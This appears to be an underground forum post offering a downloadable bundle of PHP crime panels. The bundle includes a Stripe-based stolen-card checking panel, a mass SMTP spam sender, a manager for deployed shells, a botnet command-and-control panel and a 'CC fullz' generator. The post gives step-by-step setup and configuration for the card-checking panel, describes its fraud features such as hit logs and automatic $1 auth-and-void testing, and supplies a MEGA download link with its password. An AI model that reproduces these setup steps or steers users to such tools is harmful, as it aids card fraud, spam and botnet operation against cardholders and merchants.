PHP Web Panel Collection β€” Carding Panels, SMTP Senders, Shell Managers & Botnet C2 Web Interfaces

Blacksec

Administrator
Staff member
🌐 PHP WEB PANEL COLLECTION 🌐Carding Panels β€’ SMTP Senders β€’ Shell Managers β€’ Botnet C2 β€’ Web Interfaces

⚑ PANEL COLLECTION: Collection of PHP-based web panels for various operations. Includes carding panels with Stripe/Moon integration, SMTP mass mailers with tracking, reverse shell managers with web UI, and lightweight botnet C2 panels. All PHP 8.2 compatible.

PANEL CATALOG
PanelFunctionPHP VerRequiresSizeEst. Setup Time
StripeCheck PanelMulti-user card checking web UI8.1+MySQL + Stripe API keys2.5 MB30 min
PhantomMailerMass SMTP sender with open/click tracking8.0+SMTP servers + MySQL3.2 MB20 min
ShellManagerWeb UI for managing deployed shells7.4+MySQL1.8 MB15 min
BotNet LiteLightweight C2 panel for bot management8.0+MySQL + WebSocket server5.0 MB1 hour
AutoCCGenAuto-generated CC fullz via web8.1+MySQL + BIN database1.2 MB10 min
ProxyRotatorProxy management + rotation API8.0+MySQL900 KB15 min
WPScanner ProWordPress vulnerability scanner panel8.0+MySQL + WP API2.0 MB20 min
ComboDedupCombo cleaning + dedup web panel8.0+MySQL1.5 MB10 min

STRIPECHECK PANEL SETUP
Code:
1. Upload files to your web server (Apache/Nginx)
2. Import database: mysql -u root -p dbname < stripecheck.sql
3. Edit config.php:
   define('DB_HOST', 'localhost');
   define('DB_USER', 'panel_user');
   define('DB_PASS', 'strong_password');
   define('DB_NAME', 'stripecheck');
   define('STRIPE_SECRET_KEY', 'sk_live_...');
   define('STRIPE_WEBHOOK_SECRET', 'whsec_...');
   define('ADMIN_USER', 'admin');
   define('ADMIN_PASS', password_hash('yourpassword', PASSWORD_BCRYPT));

4. Set up webhook: stripe webhook endpoint β†’ https://yourdomain.com/webhook.php
5. Add users: /admin/users.php
6. Each user gets: API key β†’ used in OB2/checker with webhook receipt

Features:
  - Multi-user with usage limits per user
  - Real-time card checking via webhook
  - Hit log: all successful charges with details
  - Balance tracking: deduct per check
  - BIN filtering: block specific BINs
  - Proxy pool management
  - Auto-void: $1 auth β†’ void automatically
  - Statistics dashboard: hits by gateway, BIN, country

DOWNLOAD
Code:
All panels: [URL="https://mega.nz/file/BlackSec_PHP_Panels_July2026"]File on MEGA[/URL]
Size: 18 MB | Password: PHPpanels2026
Includes: Source code + SQL dumps + setup guides + sample configs + README for each

🌐 A panel is your command center. Build it right, run it clean. 🌐
 
Top